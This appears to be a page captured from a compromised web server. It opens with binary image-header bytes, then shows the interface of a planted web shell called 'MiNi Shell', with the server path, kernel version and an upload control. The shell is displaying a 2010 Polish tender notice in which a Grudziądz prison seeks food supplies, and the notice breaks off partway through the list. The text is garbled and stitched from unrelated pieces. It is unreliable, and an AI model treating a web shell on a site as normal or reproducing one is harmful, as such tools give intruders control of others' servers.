JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100521/139576-N-2010.html

<p class="kh_header"><b>Grudziądz: Nr sprawy DKw/220/05/2010 - artykuły spożywcze -  różne</b><br>
<b>Numer ogłoszenia: 139576 - 2010; data zamieszczenia: 21.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny nr 2 , ul. Sikorskiego 13/17, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 6421460 w. 280, faks 056 6421398.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nr sprawy DKw/220/05/2010 - artykuły spożywcze -  różne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem udzielanego zamówienia publicznego jest dostawa, artykułów spożywczych -  różnych w asortymencie wymienionym poniżej:Lp.
Nazwa produktu/Kod CPV/Norma/Ilość szacunkowa [kg/l]
Część 1 - Konserwy mięsne
1
Konserwa mięsna (typu mielonka) 300 g (z otwieraczem)
15131000-5
PN-A-82022
500;
2
Pasztet drobiowy 100-150 g opak. typu alupak
15131310-1
PN-A-86525
200;
3
Pasztet drobiowy 300 g
(z otwieraczem)
15131310-1
PN-A-86525
500;
4
Pasztet mazowiecki 300 g
(z otwieraczem)
15131310-1
PN-A-86525
500;
Część 2 - Warzywa i owoce przetworzone
1
Chrzan tarty z kwaskiem cytrynowym opak. do 1 kg
15871000-4
PN-R-75520:1993
200;
2
Dżem opakowania 25-80 g
15332290-3
PN-A-75100
50;
3
Dżem opakowania do 15 kg
15332290-3
PN-A-75100
1400;
4
Groszek konserwowy opak. do 1 kg
15331462-3
PN-76/A-77803
250;
5
Koncentrat pomidorowy 30% opak. do 1 kg
15331427-6
PN-75/A-77601
250;
6
Koncentrat pomidorowy 30% opak. do 5 kg
15331462-3
PN-76/A-77803
1600;
7
Leczo pieczarkowe - opakowanie do 20 kg  15331430-0
PN-A-86951
900;
8
Marmolada opak. do 15 kg
15332230-5
PN-93/A-75103
1400;
9
Miód sztuczny opak. do 15 kg
15831600-8
PN-82/A-74760
350;
10
Pure ziemniaczane opak. do 10 kg
15313000-5
PN-A-74722
150;
Część 3 - Przetwory zbożowe
1
Kasza jęczmienna gruba opak. do 50 kg
15613100-9
PN-A-74203
1500;
2
Kasza manna opak. do 50 kg
15613100-9
PN-A-74036
700;
3
Makaron - świderki, kolanka, rurki opak. do 20 kg
15851100-9
PN-A-74131
2750;
4
Makaron - Nitki opak. do 20 kg
15851100-9
PN-A-74131
950;
5
Mąka pszenna typu 500 opak. do 50 kg
15612100-2
PN-A-74022
3500;
6
Ryż łuskany biały długoziarnisty opak. do 50 kg
15611000-4
PN-ISO 7301
1600;
Część 4 - Instanty
1
Barszcz czerwony opak. do 30 kg
15891000-0
PN-A-94050
130;
2
Bulion wołowy - opak. do 30 kg
15891500-5
PN-A-94052
300;
3
Kisiel opak. do 5 kg
15800000-6
PN-A-94051
130;
4
Przyprawa w płynie (typu magii) opak. do 1 kg
15890000-3
PN-A-94052
600;
5
Przyprawa warzywna
(typu jarzynka) opak. do 30 kg
15890000-3
PN-A-94052
650;
6
Rosół z kury opak. do 30 kg
15891000-0
PN-A-94052
1200;
7
Sos boloński opak. do 30 kg
15871260-4
PN-A-94050
120;
8
Sos cygański opak. do 30 kg
15871260-4
PN-A-94050
250;
9
Sos grzybowy opak. do 30 kg
15871260-4
PN-A-94050
150;
10
Sos neapolitański - opak. do 30 kg
15871260-4
PN-A-94050
80;
11
Sos węgierski - opak. do 30 kg
15871260-4
PN-A-94050
80;
12
Zupa ogonowa opak. do 30 kg
15891000-0
PN-A-94050
240;
13
Zupa pieczarkowa opak. do 30 kg
15891000-0
PN-A-94050
100;
14
Zupa porowa - opak. do 30 k
15891000-0
PN-A-94050
160;
15
Zupa żurek opak. do 30 kg
15891000-0
PN-A-94050
210;
Część 5 - Przyprawy
1
Bazylia suszona opak. 0.1 kg
15872300-4
PN-A-86959
2;
2
Curry opak. 0.1 kg
15871270-7
PN-A-86967
3;
3
Cynamon mielony opak. do 0,1 kg
15872200-3
BN-68/8132-09
2;
4
Czosnek suszony granulowany opak. do 0,1 kg
15871000-4
PN-R-75518
7;
5
Herbata granulowana opak. do 10 kg
15863000-5
PN-ISO3720
270;
6
Kawa zbożowa opak. do 30 kg
15861000-1
PN-A-79010
530;
7
Kminek opak. do 0,1 kg
15872000-1
PN-A-86953
7;
8
Koperek suszony opak. do 0,1 kg
15893000-4
PN-63/A-77603
5;
9
Kwasek cytrynowy - spożywczy opak. do 0,1 kg
15880000-0
PN-81/A-79734
15;
10
Liść laurowy opak. do 0,1 kg
15890000-3
PN-82/R-87011
20;
11
Majeranek opak. do 0,1 kg
15890000-3
PN-A-86958
35;
12
Majonez opak. do 1 kg
15871273-8
PN-A-86950
120;
13
Mleko w proszku odtłuszczone opak. do 25 kg 
15511700-0
PN-92/A-86024
100;
14
Musztarda opak. do 1 kg
15871250-1
PN-A-86964
170;
15
Ocet Spirytusowy 10% opak. do 1 l
15871110-8
PN-EN 13188
180;
16
Oregano suszone opak. do 0,1 kg
15872300-4
PN-A-86967
2;
17
Papryka ostra opak. do 0,1 kg
15890000-3
PN-A-86955
30;
18
Papryka słodka opak. do 0,1 kg
15890000-3
PN-A-86955
30;
19
Pietruszka (natka) suszona w opak. do 0,1 kg
15872300-4
PN-A-86967
33;
20
Pieprz naturalny mielony opak. do 0,1 kg
15872100-2
PN-A-86965
10;
21
Przyprawa do mięsa mielonego opak. do 0,1 kg
15871270-7
PN-A-86967
3;
22
Przyprawa do ryb opak. do 0,1 kg
15871270-7
PN-A-86967
5;
23
Sól spożywcza jodowana opak. do 50 kg
15872400-5
PN-C-84081-2
1100;
24
Ziele angielskie opak. do 0,1 kg
15890000-3
PN-A-86955
17;
25
Zioła prowansalskie opak. do 0,1 kg
15872000-1
PN-A-86967
5;
Cześć 6 - Wyroby z soi
1
Kotlet sojowy (schabowy) opak. do 30 kg
15890000-3
PN-ISO 5506
150;
2
Soja granulat opak. do 30 kg
15890000-3
PN-ISO 5506
120;
3
Soja kostka opak. do 30 kg
15890000-3
PN-ISO 5506
200;
Cześć 7 - Rośliny strączkowe
1
Fasola Jaś drobna opak. do 50 kg
01121210-6
PN-75/R65031
450;
2
Fasola Jaś gruba opak. do 50 kg
01121213-7
PN-75/R65031
800;
3
Groch łuskany opak. do 50 kg
01112213-1
PN-81/R65032
700;
Cześć 8 - Olej spożywczy
1
Olej spożywczy opak. do 10 l
15411100-3
PN-A-86901
1600;
Cześć 9 - Cukier
1
Cukier opak. do 50 kg
15831200-4
PN-A-74850
4300;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.33.00.00-0, 15.61.00.00-7, 15.87.00.00-7, 03.22.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do siwz;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do siwz;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do siwz;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do siwz;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do siwz;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>miana niniejszej umowy jest dopuszczalna na warunkach określonych w art 144 ustawy Pzp. Zmiany w niniejszej umowie mogą zostać wprowadzone w zakresie:
nazwy, adresu oraz osób reprezentujących strony,
zmiany cen artykułów spożywczych wymienionych w umowie o kwotę nie większą niż wynikająca ze wskaźnika cen towarów i usług konsumpcyjnych podanego przez GUS w Monitorze Polskim w okresie trwania umowy,
zmiany cen artykułów spożywczych wymienionych w umowie ze względu na zmianę urzędowej stawki VAT na artykuły, których dotyczy umowa,
każdej zmiany która jest korzystna dla zamawiającego lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny Nr 2
ul. Sikorskiego 13/17
86-300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2010 godzina 11:00, miejsce: Sekretariat
Zakład Karny Nr 2
ul. Sikorskiego 13/17
86-300 Grudziądz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 - Konserwy mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Konserwa mięsna (typu mielonka) 300 g (z otwieraczem)
15131000-5
PN-A-82022
500;
2
Pasztet drobiowy 100-150 g opak. typu alupak
15131310-1
PN-A-86525
200;
3
Pasztet drobiowy 300 g
(z otwieraczem)
15131310-1
PN-A-86525
500;
4
Pasztet mazowiecki 300 g
(z otwieraczem)
15131310-1
PN-A-86525
500;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 - Warzywa i owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Chrzan tarty z kwaskiem cytrynowym opak. do 1 kg
15871000-4
PN-R-75520:1993
200;
2
Dżem opakowania 25-80 g
15332290-3
PN-A-75100
50;
3
Dżem opakowania do 15 kg
15332290-3
PN-A-75100
1400;
4
Groszek konserwowy opak. do 1 kg
15331462-3
PN-76/A-77803
250;
5
Koncentrat pomidorowy 30% opak. do 1 kg
15331427-6
PN-75/A-77601
250;
6
Koncentrat pomidorowy 30% opak. do 5 kg
15331462-3
PN-76/A-77803
1600;
7
Leczo pieczarkowe - opakowanie do 20 kg
15331430-0
PN-A-86951
900;
8
Marmolada opak. do 15 kg
15332230-5
PN-93/A-75103
1400;
9
Miód sztuczny opak. do 15 kg
15831600-8
PN-82/A-74760
350;
10
Pure ziemniaczane opak. do 10 kg
15313000-5
PN-A-74722
150;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3 - Przetwory zbożowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Kasza jęczmienna gruba opak. do 50 kg
15613100-9
PN-A-74203
1500;
2
Kasza manna opak. do 50 kg
15613100-9
PN-A-74036
700;
3
Makaron - świderki, kolanka, rurki opak. do 20 kg
15851100-9
PN-A-74131
2750;
4
Makaron - Nitki opak. do 20 kg
15851100-9
PN-A-74131
950;
5
Mąka pszenna typu 500 opak. do 50 kg
15612100-2
PN-A-74022
3500;
6
Ryż łuskany biały długoziarnisty opak. do 50 kg
15611000-4
PN-ISO 7301
1600;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4 - Instanty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Barszcz czerwony opak. do 30 kg
15891000-0
PN-A-94050
130;
2
Bulion wołowy - opak. do 30 kg
15891500-5
PN-A-94052
300;
3
Kisiel opak. do 5 kg
15800000-6
PN-A-94051
130;
4
Przyprawa w płynie (typu magii) opak. do 1 kg
15890000-3
PN-A-94052
600;
5
Przyprawa warzywna
(typu jarzynka) opak. do 30 kg
15890000-3
PN-A-94052
650;
6
Rosół z kury opak. do 30 kg
15891000-0
PN-A-94052
1200;
7
Sos boloński opak. do 30 kg
15871260-4
PN-A-94050
120;
8
Sos cygański opak. do 30 kg
15871260-4
PN-A-94050
250;
9
Sos grzybowy opak. do 30 kg
15871260-4
PN-A-94050
150;
10
Sos neapolitański - opak. do 30 kg
15871260-4
PN-A-94050
80;
11
Sos węgierski - opak. do 30 kg
15871260-4
PN-A-94050
80;
12
Zupa ogonowa opak. do 30 kg
15891000-0
PN-A-94050
240;
13
Zupa pieczarkowa opak. do 30 kg
15891000-0
PN-A-94050
100;
14
Zupa porowa - opak. do 30 k
15891000-0
PN-A-94050
160;
15
Zupa żurek opak. do 30 kg
15891000-0
PN-A-94050
210;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5 - Przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Bazylia suszona opak. 0.1 kg
15872300-4
PN-A-86959
2;
2
Curry opak. 0.1 kg
15871270-7
PN-A-86967
3;
3
Cynamon mielony opak. do 0,1 kg
15872200-3
BN-68/8132-09
2;
4
Czosnek suszony granulowany opak. do 0,1 kg
15871000-4
PN-R-75518
7;
5
Herbata granulowana opak. do 10 kg
15863000-5
PN-ISO3720
270;
6
Kawa zbożowa opak. do 30 kg
15861000-1
PN-A-79010
530;
7
Kminek opak. do 0,1 kg
15872000-1
PN-A-86953
7;
8
Koperek suszony opak. do 0,1 kg
15893000-4
PN-63/A-77603
5;
9
Kwasek cytrynowy - spożywczy opak. do 0,1 kg
15880000-0
PN-81/A-79734
15;
10
Liść laurowy opak. do 0,1 kg
15890000-3
PN-82/R-87011
20;
11
Majeranek opak. do 0,1 kg
15890000-3
PN-A-86958
35;
12
Majonez opak. do 1 kg
15871273-8
PN-A-86950
120;
13
Mleko w proszku odtłuszczone opak. do 25 kg 
15511700-0
PN-92/A-86024
100;
14
Musztarda opak. do 1 kg
15871250-1
PN-A-86964
170;
15
Ocet Spirytusowy 10% opak. do 1 l
15871110-8
PN-EN 13188
180;
16
Oregano suszone opak. do 0,1 kg
15872300-4
PN-A-86967
2;
17
Papryka ostra opak. do 0,1 kg
15890000-3
PN-A-86955
30;
18
Papryka słodka opak. do 0,1 kg
15890000-3
PN-A-86955
30;
19
Pietruszka (natka) suszona w opak. do 0,1 kg
15872300-4
PN-A-86967
33;
20
Pieprz naturalny mielony opak. do 0,1 kg
15872100-2
PN-A-86965
10;
21
Przyprawa do mięsa mielonego opak. do 0,1 kg
15871270-7
PN-A-86967
3;
22
Przyprawa do ryb opak. do 0,1 kg
15871270-7
PN-A-86967
5;
23
Sól spożywcza jodowana opak. do 50 kg
15872400-5
PN-C-84081-2
1100;
24
Ziele angielskie opak. do 0,1 kg
15890000-3
PN-A-86955
17;
25
Zioła prowansalskie opak. do 0,1 kg
15872000-1
PN-A-86967
5;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Cześć 6 - Wyroby z soi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Kotlet sojowy (schabowy) opak. do 30 kg
15890000-3
